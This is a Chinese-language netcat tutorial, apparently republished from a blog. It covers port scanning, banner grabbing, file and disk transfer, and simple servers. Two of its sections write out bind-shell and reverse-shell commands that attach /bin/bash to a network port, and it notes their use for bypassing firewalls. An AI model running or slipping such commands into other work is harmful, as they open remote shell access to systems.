Linux系统中nc工具那些不为人知的用法

Linux nc命令用法

参考地址:https://www.cnblogs.com/jjzd/p/6306273.html

-g<网关>:设置路由器跃程通信网关,最多设置8个;
-G<指向器数目>:设置来源路由指向器,其数值为4的倍数;
-h:在线帮助;
-i<延迟秒数>:设置时间间隔,以便传送信息及扫描通信端口;
-l:使用监听模式,监控传入的资料;
-n:直接使用ip地址,而不通过域名服务器;
-o<输出文件>:指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;
-p<通信端口>:设置本地主机使用的通信端口;
-r:指定源端口和目的端口都进行随机的选择;
-s<来源位址>:设置本地主机送出数据包的IP地址;
-u:使用UDP传输协议;
-v:显示指令执行过程;
-w<超时秒数>:设置等待连线的时间;
-z:使用0输入/输出模式,只在扫描通信端口时使用。

 


首先查看是否安装了nc工具

rpm -qa | grep ^nmap-ncat || yum -y install nmap-ncat

 

监听本地主机:
$nc -l 80
连接到远程主机:
nc -nvv 192.168.x.x 80
连到192.168.x.x的TCP80端口.Server:$nc -l 2389
Client:$ nc -w 10 localhost 2389
使用 -w 参数来指定连接的空闲超时时间,该参数紧接一个数值,代表秒数,如果连接超过指定时间则连接会被终止

 

1、端口扫描
nc -z -v -n 192.168.1.1 21-25
连续端口写成 21-25
z 参数告诉netcat使用0 IO,连接成功后立即关闭连接, 不进行数据交换.
v 参数指详细输出.
n 参数告诉netcat 不要使用DNS反向查询IP地址的域名.# 以下这条命令可以指定ip,或者域名
nc -v 127.0.0.1 22 
localhost [127.0.0.1] 22 (ssh) open SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
"SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4"为Banner信息。Banner是一个文本,Banner是一个你连接的服务发送给你的文本信息。当你试图鉴别漏洞或者服务的类型和版本的时候,Banner信息是非常有用的。但是,并不是所有的服务都会发送banner.一旦你发现开放的端口,你可以容易的使用netcat 连接服务抓取他们的banner。2、Chat Server
假如你想和你的朋友聊聊,有很多的软件和信息服务可以供你使用。但是,如果你没有这么奢侈的配置,比如你在计算机实验室,所有的对外的连接都是被限制的,你怎样和整天坐在隔壁房间的朋友沟通那?不要郁闷了,netcat提供了这样一种方法,你只需要创建一个Chat服务器,一个预先确定好的端口,这样子他就可以联系到你了。
Server:$nc -l 20000
netcat 命令在20000端口启动了一个tcp 服务器,所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。
Client:$nc 192.168.1.1 200003、文件传输
Server$nc -l 20000 < file.txt
Client$nc -n 192.168.1.1 20000 > file.txt4、目录传输
Server:tar -cvf – dir_name | nc -l 20000
Client:$nc -n 192.168.1.1 20000 | tar -xvf -5、加密你通过网络发送的数据
Server:$nc localhost 20000 | mcrypt –flush –bare -F -q -d -m ecb > file.txt使用mcrypt工具加密数据。
Client:$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 20000
使用mcrypt工具解密数据。
以上两个命令会提示需要密码,确保两端使用相同的密码。
这里我们是使用mcrypt用来加密,使用其它任意加密工具都可以。6、流视频
Server:$cat video.avi | nc -l 20000
这里我们只是从一个视频文件中读入并重定向输出到netcat客户端
Client:$nc 192.168.1.1 20000 | mplayer -vo x11 -cache 3000 -
这里我们从socket中读入数据并重定向到mplayer。7、克隆一个设备
如果你已经安装配置一台Linux机器并且需要重复同样的操作对其他的机器,而你不想在重复配置一遍。不在需要重复配置安装的过程,只启动另一台机器的一些引导可以随身碟和克隆你的机器。
克隆Linux PC很简单,假如你的系统在磁盘/dev/sda上
Server:
$dd if=/dev/sda | nc -l 20000
Client:
$nc -n 192.168.1.1 20000 | dd of=/dev/sda
dd是一个从磁盘读取原始数据的工具,我通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中,它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区,我们可以根据我们系统root分区的位置,更改sda 为sda1,sda2.等等。8、打开一个shell
我们已经用过远程shell-使用telnet和ssh,但是如果这两个命令没有安装并且我们没有权限安装他们,我们也可以使用netcat创建远程shell。
假设你的netcat支持 -c -e 参数(原生 netcat)
Server
$nc -l 20000 -e /bin/bash -i
Client
$nc 192.168.1.1 20000这里我们已经创建了一个netcat服务器并且表示当它连接成功时执行/bin/bash
假如netcat 不支持-c 或者 -e 参数(openbsd netcat),我们仍然能够创建远程shell
Server
$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 20000 > /tmp/tmp_fifo这里我们创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出,然后管道到netcat 运行的端口20000上。至此,我们已经把netcat的输出重定向到fifo文件中。
说明:
从网络收到的输入写到fifo文件中
cat 命令读取fifo文件并且其内容发送给sh命令
sh命令进程受到输入并把它写回到netcat。
netcat 通过网络发送输出到client
至于为什么会成功是因为管道使命令平行执行,fifo文件用来替代正常文件,因为fifo使读取等待而如果是一个普通文件,cat命令会尽快结束并开始读取空文件。
在客户端仅仅简单连接到服务器
Client
$nc -n 192.168.1.1 20000你会得到一个shell提示符在客户端9、反向shell
反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务。
Server
$nc -l 20000在客户端,简单地告诉netcat在连接完成后,执行shell。
Client
$nc 192.168.1.1 20000 -e /bin/bash现在,什么是反向shell的特别之处呢
反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如,我有一个专用IP地址为192.168.1.1,我使用代理服务器连接到外部网络。如果我想从网络外部访问 这台机器如1.2.3.4的shell,那么我会用反向外壳用于这一目的。10、指定源端口
假设你的防火墙过滤除25端口外其它所有端口,你需要使用-p选项指定源端口。
Server
$nc -l 20000Client
$nc 192.168.1.1 20000 25使用1024以内的端口需要root权限。
该命令将在客户端开启25端口用于通讯,否则将使用随机端口。11、指定源地址
假设你的机器有多个地址,希望明确指定使用哪个地址用于外部数据通讯。我们可以在netcat中使用-s选项指定ip地址。
Server
$nc -u -l 20000 < file.txtClient
$nc -u 192.168.1.1 20000 -s 172.31.100.5 > file.txt该命令将绑定地址172.31.100.512、静态web页面服务器
新建一个网页,命名为somepage.html;
新建一个shell script:
while true; do
nc -l 80 -q 1 < somepage.html;
done用root权限执行,然后在浏览器中输入127.0.0.1打开看看是否正确运行。
nc 指令通常都是給管理者進行除錯或測試等動作用的,所以如果只是單純需要臨時的網頁伺服器,使用 Python 的 SimpleHTTPServer 模組會比較方便。13、模拟HTTP Headers
$nc www.huanxiangwu.com 80
GET / HTTP/1.

 

转载于:https://www.cnblogs.com/southtianmen/p/10727150.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/386990.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

python pandas dataframe基本使用整理

dataframe是一种表格型的数据存储结构&#xff0c;可以看作是几个serie的集合。dataframe既有行索引&#xff0c;也有列索引。 以下代码环境为google colab/jupyter notebook。 接下来就对dataframe的基本使用进行整理。 dataframe也从属于pandas模块&#xff0c;因此还是老规矩…

常见开源分布式存储系统

对比说明 /文件系统 TFS FastDFS MogileFS MooseFS GlusterFS Ceph 开发语言 C C Perl C C C 开源协议 GPL V2 GPL V3 GPL GPL V3 GPL V3 LGPL 数据存储方式 块 文件/Trunk 文件 块 文件/块 对象/文件/块 集群节点通信协议 私有协议&#xff08;T…

[十二省联考2019]皮配

题目链接 选一个派系和一个阵营可以唯一确定一名导师 因为每一个阵营里的导师都分别来自不同派系&#xff0c;所以k0时&#xff0c;对阵营的选择是不影响对派系的选择的 唯一的限制就是同城市的要在同一个阵营 所以以每个城市为物品&#xff0c;物品大小为该城市的人数&#xf…

机器学习理论梳理1: PCA主成分分析

机器学习的理论部分学习知识点比较乱且杂。我这里通过几篇文章&#xff0c;简单总结一下自己对机器学习理论的理解&#xff0c;以防遗忘。第一篇文章主要概述了机器学习的基本任务以及一个常用的降维方法&#xff0c;主成分分析。 机器学习的基本任务 机器学习能实现许多不同…

29 _react-router说明

一、SPA的理解 1.单页面web应用(single page web application ,SPA) 2.整个应用只有一个完整的页面 3.点击页面中的链接不会刷新页面&#xff0c;本身也不会向服务器发请求 4.当点击路由链接时&#xff0c;只会做页面的局部更新 5.数据都需要通过ajax请求获取&#xff0c;并在前…

Java程序员如何快速理解Kubernetes

我们希望微服务是可复制的&#xff0c;可替换的工作节点&#xff0c;这样可以轻松进行升级或降级&#xff0c;同时无需任何停机时间&#xff0c;并花费最少代价的管理。我们可以说我们希望他们成为我们的小黄人&#xff08;minions&#xff09;。本文我们将通过一个简单的例子来…

NLP基础 : HMM 隐马尔可夫模型

Hidden Markov Model, HMM 隐马尔可夫模型&#xff0c;是一种描述隐性变量(状态)和显性变量(观测状态)之间关系的模型。该模型遵循两个假设&#xff0c;隐性状态i只取决于前一个隐性状态i-1&#xff0c;而与其他先前的隐形状态无关。观测状态也只取决于当前的隐形状态。因此我们…

关于秒杀系统优化方向

今天听了一节咕泡学院的公开课&#xff0c;有收获。 秒杀系统的特点&#xff1a; 1.限时&#xff1b;2.限量供应&#xff1b;3.并发量大&#xff1b;如何优化&#xff1a; 1.客户端数据缓存。 2.CDN加速。 3.nginx动静分离&#xff0c;静态资源缓存&#xff0c;负载均衡。 4.se…

Mysql插入很慢,找到了稍微快点的方法

MYSQL批量插入数据库实现语句性能分析 假定我们的表结构如下 代码如下 CREATE TABLE example ( example_id INT NOT NULL, name VARCHAR( 50 ) NOT NULL, value VARCHAR( 50 ) NOT NULL, other_value VARCHAR( 50 ) NOT NULL ) 通常情况下单条插入的sql语句我们会这么写&…

Linux - 时间相关命令 - ntpdate, date, hwclock

1. 概述 最近也不知道写啥了, 把之前的老文档整理一下, 凑个数什么的配置时间这种工作, 偶尔还是要用一下主要描述 3 个命令的简单适用 ntpdatehwlock2. ntpdate 1. 概述 用于同步时钟的命令2. 机制 通常是有一个服务器对外提供时间客户端可以与时间服务器同步ntp 是他们之间交…

RUNOOB python练习题1

用来练手的python 练习题&#xff0c;原链接 : python练习实例1 题干 : 有四个数字&#xff1a;1、2、3、4&#xff0c;能组成多少个互不相同且无重复数字的三位数&#xff1f;各是多少&#xff1f; import numpy as np cen np.array([1,2,3,4]) tens np.array([1,2,3,4])…

mysql explain用法和结果的含义

explain显示了mysql如何使用索引来处理select语句以及连接表。可以帮助选择更好的索引和写出更优化的查询语句。 使用方法&#xff0c;在select语句前加上explain就可以了&#xff1a; 如&#xff1a; explain select surname,first_name form a,b where a.idb.id EXPLAIN列…

日志模块logging用法

一、常用日志记录场景及最佳解决方案&#xff1a; 日志记录方式 最佳记录日志方案 普通情况下&#xff0c;在控制台显示输出 print() 报告正常程序操作过程中发生的事件 logging.info()(或者更详细的logging.debug()) 发出有关特定事件的警告 warnings.warn()或者loggin…

MySQL 亿级数据需求的优化思路(一),交易流水记录的查询

对MySQL的性能和亿级数据的处理方法思考&#xff0c;以及分库分表到底该如何做&#xff0c;在什么场景比较合适&#xff1f; 比如银行交易流水记录的查询 限盐少许&#xff0c;上实际实验过程&#xff0c;以下是在实验的过程中做一些操作&#xff0c;以及踩过的一些坑&#…

RUNOOB python练习题2

用来练手的python 练习题&#xff0c;原链接 : python练习实例2 题干 : 企业发放的奖金根据利润提成。利润(I)低于或等于10万元时&#xff0c;奖金可提10%&#xff1b;利润高于10万元&#xff0c;低于20万元时&#xff0c;低于10万元的部分按10%提成&#xff0c;高于10万元的…

dubbo负载均衡策略和集群容错策略

dubbo负载均衡策略 random loadbalance 默认情况下&#xff0c;dubbo是random load balance随机调用实现负载均衡&#xff0c;可以对provider不同实例设置不同的权重&#xff0c;会按照权重来负载均衡&#xff0c;权重越大分配流量越高&#xff0c;一般就用这个默认的就可以了。…

MySQL 亿级数据需求的优化思路(二),100亿数据,1万字段属性的秒级检索

最近在研究亿级数据的时候&#xff0c;无意中看到了一个关于写58同城的文章 https://blog.csdn.net/admin1973/article/details/55251499?fromtimeline 其实上面讲的versionext的方式以及压缩json的思路&#xff0c;对于我来讲都可以看得懂&#xff0c;想得通&#xff0c;其…

RUNOOB python练习题3

用来练手的python 练习题&#xff0c;原链接 : python练习实例3 拿到题目就写了如下代码&#xff0c;思路是因为使用**0.5进行开平方操作时&#xff0c;python会将数据类型自动转换为float单精度浮点型。这里利用提取其整数部分&#xff0c;来判断这个数是否是完全平方数。 z…

使用git将项目上传到github(最简单方法)

使用git将项目上传到github&#xff08;最简单方法&#xff09; 首先你需要一个github账号&#xff0c;所有还没有的话先去注册吧&#xff01; https://github.com/ 我们使用git需要先安装git工具&#xff0c;这里给出下载地址&#xff0c;下载后一路直接安装即可&#xff1…

数据库 概念详解

数据库 概念详解 一、MySQL MySQL 事务 MySQL 锁 MySQL 二、Redis 三、MongoDB 四、Memcached 转载于:https://www.cnblogs.com/guozepingboke/p/10743648.html